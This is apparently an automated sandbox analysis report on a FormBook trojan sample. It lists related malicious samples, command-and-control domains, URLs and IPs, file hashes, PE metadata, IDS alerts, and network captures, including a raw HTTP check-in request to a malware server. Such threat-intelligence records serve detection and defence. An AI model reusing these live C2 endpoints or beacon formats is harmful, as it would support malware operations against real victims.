                                                            • www.traveladvisorsuccess.net/gs2m/?8pHX=5jhxgd&h4=R9Myd3XtH8UfpLcxkW7UMZG2K+ZHkiBKmQ+KXW7xNpgHOl826W3TGb5gIiCaUB40A9/Y
                                                            3xzHrbPdZ7.exeGet hashmaliciousBrowse
                                                            • vpn.premrera.com:443/viewpre.asp?cstring=wcxbaa-1753643374&tom=255&id=6003031
                                                            VINASHIP STAR.xlsxGet hashmaliciousBrowse
                                                            • www.cpb.site/nthe/?xtxh=21tMkqEIUZBUKU+ck7CVVp3eTiqf/+4cN27Pgp5ejfxv1jbsXk06Rfkh8MQLsUSEnTHARw==&U2=mv-t_rDPAPsD6l
                                                            MV TAICHUNG.xlsxGet hashmaliciousBrowse
                                                            • www.cpb.site/nthe/?7nMt=21tMkqEIUZBUKU+ck7CVVp3eTiqf/+4cN27Pgp5ejfxv1jbsXk06Rfkh8MQLsUSEnTHARw==&gDHho=b2JPovgHUt
                                                            BIN.exeGet hashmaliciousBrowse
                                                            • www.jwpropertiestn.com/n8ba/?I6El7rEX=iMNnVuY+gvXz0j53tPU+imZoGlggyOcz8e4ohSepbhwGfYAQxyq22Rg/4FGnobgDSPq5&yBZ02=2df8xb-H6hatkZkp
                                                            OrdGreece89244.exeGet hashmaliciousBrowse
                                                            • www.carstoriesusa.net/rvoe/?q6pHq=L4-hsduP_n0dm&5jn=fAOs8VWxDgCcN/b38ZjPEpzSltT9i6eUIfWB05FDSs6jml76oEIdxB/bsn2NMp244tD1hAXsWQ==
                                                            REMMITANCE COPY.exeGet hashmaliciousBrowse
                                                            • www.lovefromnewyork.com/kmb0/?H6JHLVy=kV+lEXg8yEf0RijPwLmsZpVBvRfnl4wggG07Ng5Cei2p8cSyeu82h3Ryg2Q6rnDNHAltvCyP6Q==&r48XKx=9rAHYr10f

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            www.xn--aprendes-espaol-brb.comXaTgTJhfol.exeGet hashmaliciousBrowse
                                                            • 217.160.0.226
                                                            vURlUPQLT0.exeGet hashmaliciousBrowse
                                                            • 217.160.0.226
                                                            windowsupdate.s.llnwi.netORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            HqiJ8HpbxU.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            PEKv5PX7Wq.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            R6QyqCNJgljVTjY.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            SsbgfSoVLC.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            pvHBhNUyIm.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            Request For New Qoute - Ist Order.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            569vj51Zrs.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            correction HAWB.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            correction HAWB.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            Statement of Account.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            Statement of Account.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            jh6KzwrXQp.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            heX1kOkwqy.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            mixsix_20211013-084409.exeGet hashmaliciousBrowse
                                                            • 178.79.242.0
                                                            2rd Quater Order Quotation.zip.xlsGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            DOC REC EIPT.htmlGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            Efe-8 GPP Project Steel Pipe Tender.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            emil.franchi@global.com #Ud83d#Udce0 VGX47BBSBJ44838.HTMGet hashmaliciousBrowse
                                                            • 178.79.242.128
                                                            DHL Lieferschein,pdf.exeGet hashmaliciousBrowse
                                                            • 178.79.242.128

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            POWERLINE-AS-APPOWERLINEDATACENTERHKx86Get hashmaliciousBrowse
                                                            • 154.92.66.213
                                                            4SkZvkMy6JGet hashmaliciousBrowse
                                                            • 45.205.161.234
                                                            jIIPdrw41aGet hashmaliciousBrowse
                                                            • 156.242.206.51
                                                            Lv9eznkydx.exeGet hashmaliciousBrowse
                                                            • 156.242.193.106
                                                            yir8ieZzXLGet hashmaliciousBrowse
                                                            • 156.242.206.31
                                                            UpsxN0u4wiGet hashmaliciousBrowse
                                                            • 156.243.213.52
                                                            7yIx6ZIBpIGet hashmaliciousBrowse
                                                            • 154.203.73.118
                                                            4uSa8tiph0Get hashmaliciousBrowse
                                                            • 45.205.161.238
                                                            D_13567899.exeGet hashmaliciousBrowse
                                                            • 156.250.197.5
                                                            Y76514IzYhGet hashmaliciousBrowse
                                                            • 160.124.153.91
                                                            RZo4KTtZbbGet hashmaliciousBrowse
                                                            • 156.251.7.181
                                                            Oq1I3DGMP8Get hashmaliciousBrowse
                                                            • 156.242.159.6
                                                            46gV91KJhQGet hashmaliciousBrowse
                                                            • 156.244.234.135
                                                            RaVPWTArgGGet hashmaliciousBrowse
                                                            • 156.242.159.3
                                                            ZFb3RmLJzoGet hashmaliciousBrowse
                                                            • 156.244.234.133
                                                            vHLDOsbYKAGet hashmaliciousBrowse
                                                            • 156.242.206.52
                                                            T5BjNBDzJaGet hashmaliciousBrowse
                                                            • 156.252.64.214
                                                            hnBBQPVGVRGet hashmaliciousBrowse
                                                            • 154.209.59.237
                                                            55bUuUSd6jGet hashmaliciousBrowse
                                                            • 156.242.30.39
                                                            tI0W00k1vtGet hashmaliciousBrowse
                                                            • 156.251.3.6
                                                            ONEANDONE-ASBrauerstrasse48DEvbc.exeGet hashmaliciousBrowse
                                                            • 217.160.0.17
                                                            justificante de la transfer.exeGet hashmaliciousBrowse
                                                            • 212.227.15.158
                                                            vURlUPQLT0.exeGet hashmaliciousBrowse
                                                            • 74.208.236.170
                                                            82051082.exeGet hashmaliciousBrowse
                                                            • 213.171.195.105
                                                            8205108.exeGet hashmaliciousBrowse
                                                            • 74.208.236.156
                                                            Lv9eznkydx.exeGet hashmaliciousBrowse
                                                            • 217.160.0.238
                                                            c9.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            2e.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            a3.exeGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            a04.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            50.dllGet hashmaliciousBrowse
                                                            • 87.106.18.141
                                                            Quote -0071021.exeGet hashmaliciousBrowse
                                                            • 217.160.0.7
                                                            DHL SHIPMENT.HTMLGet hashmaliciousBrowse
                                                            • 217.160.0.196
                                                            hwIILTIn0n.exeGet hashmaliciousBrowse
                                                            • 217.160.0.17
                                                            just.exeGet hashmaliciousBrowse
                                                            • 212.227.15.158
                                                            2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                            • 74.208.236.156
                                                            0n1pEFuGKC.exeGet hashmaliciousBrowse
                                                            • 74.208.236.145
                                                            VmbABLKNbD.exeGet hashmaliciousBrowse
                                                            • 74.208.236.108
                                                            Update-KB250-x86.exeGet hashmaliciousBrowse
                                                            • 74.208.5.20
                                                            Update-KB2984-x86.exeGet hashmaliciousBrowse
                                                            • 74.208.5.20

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iAuPyHuUkk.exe.log
                                                            Process:C:\Users\user\Desktop\iAuPyHuUkk.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1308
                                                            Entropy (8bit):5.348115897127242
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                            MD5:832D6A22CE7798D72609B9C21B4AF152
                                                            SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                                            SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                            SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.507453805098472
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:iAuPyHuUkk.exe
                                                            File size:698880
                                                            MD5:6040407905ea1aa24dd58dc8befa4255
                                                            SHA1:96ecf27fd10a6663cbfaadb7643abeaf4061ea77
                                                            SHA256:2f2831bdecd1f925134fd944fc57f84b76ffe872e01c66f3662f1f9194a4b362
                                                            SHA512:d16e31ae6f510ab9f2f2474c064781c15e666f871a969f394f3e6590c7c1dabf19a98c62866e0342d4e6ec9cb40ab2f036c0d687c92f34df7527c340dae923f2
                                                            SSDEEP:12288:hSBIB+gqzVl16yDr67jAkWoDq5jAyWb3PnB5JRU/V18H:sBVVmEJaqdAtj/RRGV
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ... ....@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:d6e0ececc8e8f4cc

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x481a8a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x61668406 [Wed Oct 13 07:00:22 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x81a380x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x2a838.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x7fa900x7fc00False0.915104039261data7.86255981519IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x820000x2a8380x2aa00False0.18847369868data5.44795610818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xae0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountry
                                                            RT_ICON0x822e00x2762PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                            RT_ICON0x84a440x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                            RT_ICON0x9526c0x94a8data
                                                            RT_ICON0x9e7140x5488data
                                                            RT_ICON0xa3b9c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 520093696
                                                            RT_ICON0xa7dc40x25a8data
                                                            RT_ICON0xaa36c0x10a8data
                                                            RT_ICON0xab4140x988data
                                                            RT_ICON0xabd9c0x468GLS_BINARY_LSB_FIRST
                                                            RT_GROUP_ICON0xac2040x84data
                                                            RT_GROUP_ICON0xac2880x4cdata
                                                            RT_VERSION0xac2d40x378data
                                                            RT_MANIFEST0xac64c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Version Infos

                                                            DescriptionData
                                                            Translation0x0000 0x04b0
                                                            LegalCopyrightCopyright Gottschalks 2011
                                                            Assembly Version1.0.0.0
                                                            InternalNameDictionaryEnumerat.exe
                                                            FileVersion1.0.0.0
                                                            CompanyNameGottschalks
                                                            LegalTrademarks
                                                            Comments
                                                            ProductNameMapEditor1
                                                            ProductVersion1.0.0.0
                                                            FileDescriptionMapEditor1
                                                            OriginalFilenameDictionaryEnumerat.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            10/13/21-13:39:27.811719ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                            10/13/21-13:39:28.079722TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.6154.216.110.149
                                                            10/13/21-13:39:28.079722TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.6154.216.110.149
                                                            10/13/21-13:39:28.079722TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.6154.216.110.149

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 13, 2021 13:39:05.430855036 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.576894045 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.577075958 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.577222109 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.766220093 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854733944 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854760885 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854775906 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854795933 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854813099 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854831934 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854851961 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854870081 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854887009 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854902983 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854929924 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.855003119 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.001059055 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001080036 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001091957 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001105070 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001203060 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.001260996 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.001612902 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001641035 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.002245903 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.002320051 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.148061991 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:16.157680035 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.177623987 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.181229115 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.181458950 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.204415083 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.395705938 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.395731926 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.395986080 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.396100998 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.415990114 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:27.799329042 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.079366922 CEST8049827154.216.110.149192.168.2.6
                                                            Oct 13, 2021 13:39:28.079515934 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.079721928 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.372508049 CEST8049827154.216.110.149192.168.2.6
                                                            Oct 13, 2021 13:39:28.372539043 CEST8049827154.216.110.149192.168.2.6
                                                            Oct 13, 2021 13:39:28.372772932 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.372872114 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.653304100 CEST8049827154.216.110.149192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 13, 2021 13:39:00.196365118 CEST5005553192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:00.275882006 CEST53500558.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:05.286163092 CEST6137453192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:05.422707081 CEST53613748.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:11.041781902 CEST5033953192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:11.082210064 CEST53503398.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:16.125418901 CEST6330753192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:16.155879974 CEST53633078.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:21.413523912 CEST4969453192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:21.450542927 CEST53496948.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:26.461357117 CEST5498253192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:27.473282099 CEST5498253192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:27.798012018 CEST53549828.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:27.811642885 CEST53549828.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:33.414989948 CEST5001053192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:33.463068962 CEST53500108.8.8.8192.168.2.6

                                                            ICMP Packets

                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Oct 13, 2021 13:39:27.811718941 CEST192.168.2.68.8.8.8d005(Port unreachable)Destination Unreachable

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Oct 13, 2021 13:39:00.196365118 CEST192.168.2.68.8.8.80x6a87Standard query (0)www.iphone13promax.designA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:05.286163092 CEST192.168.2.68.8.8.80x69e9Standard query (0)www.vintagepaseo.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:11.041781902 CEST192.168.2.68.8.8.80x9cd5Standard query (0)www.brandmty.netA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:16.125418901 CEST192.168.2.68.8.8.80xda7Standard query (0)www.xn--aprendes-espaol-brb.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:21.413523912 CEST192.168.2.68.8.8.80x1561Standard query (0)www.districonio.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:26.461357117 CEST192.168.2.68.8.8.80x9ea6Standard query (0)www.cyebang.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:27.473282099 CEST192.168.2.68.8.8.80x9ea6Standard query (0)www.cyebang.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:33.414989948 CEST192.168.2.68.8.8.80x18ceStandard query (0)www.umdasch-lagertechnik.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Oct 13, 2021 13:38:13.648951054 CEST8.8.8.8192.168.2.60x17aeNo error (0)windowsupdate.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:00.275882006 CEST8.8.8.8192.168.2.60x6a87Server failure (2)www.iphone13promax.designnonenoneA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:05.422707081 CEST8.8.8.8192.168.2.60x69e9No error (0)www.vintagepaseo.com208.91.197.27A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:11.082210064 CEST8.8.8.8192.168.2.60x9cd5Name error (3)www.brandmty.netnonenoneA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:16.155879974 CEST8.8.8.8192.168.2.60xda7No error (0)www.xn--aprendes-espaol-brb.com217.160.0.226A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:21.450542927 CEST8.8.8.8192.168.2.60x1561Name error (3)www.districonio.comnonenoneA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:27.798012018 CEST8.8.8.8192.168.2.60x9ea6No error (0)www.cyebang.com154.216.110.149A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:27.811642885 CEST8.8.8.8192.168.2.60x9ea6No error (0)www.cyebang.com154.216.110.149A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:33.463068962 CEST8.8.8.8192.168.2.60x18ceName error (3)www.umdasch-lagertechnik.comnonenoneA (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • www.vintagepaseo.com
                                                            • www.xn--aprendes-espaol-brb.com
                                                            • www.cyebang.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.649805208.91.197.2780C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 13, 2021 13:39:05.577222109 CEST6005OUTGET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.vintagepaseo.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:05.854733944 CEST6006INHTTP/1.1 200 OK
                                                            Date: Wed, 13 Oct 2021 11:39:05 GMT
                                                            Server: Apache
                                                            Set-Cookie: vsid=917vr3816707456615690; expires=Mon, 12-Oct-2026 11:39:05 GMT; Max-Age=157680000; path=/; domain=www.vintagepaseo.com; HttpOnly
                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BvmoE1YFCm+tBN52SitLTqdTVO+b/MNnOMS6bzT4FdAriOe/RlkeAXaeSbohmAblVkfZ8kWSX7V6WunDyRriUQ==
                                                            Keep-Alive: timeout=5, max=125
                                                            Connection: Keep-Alive
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
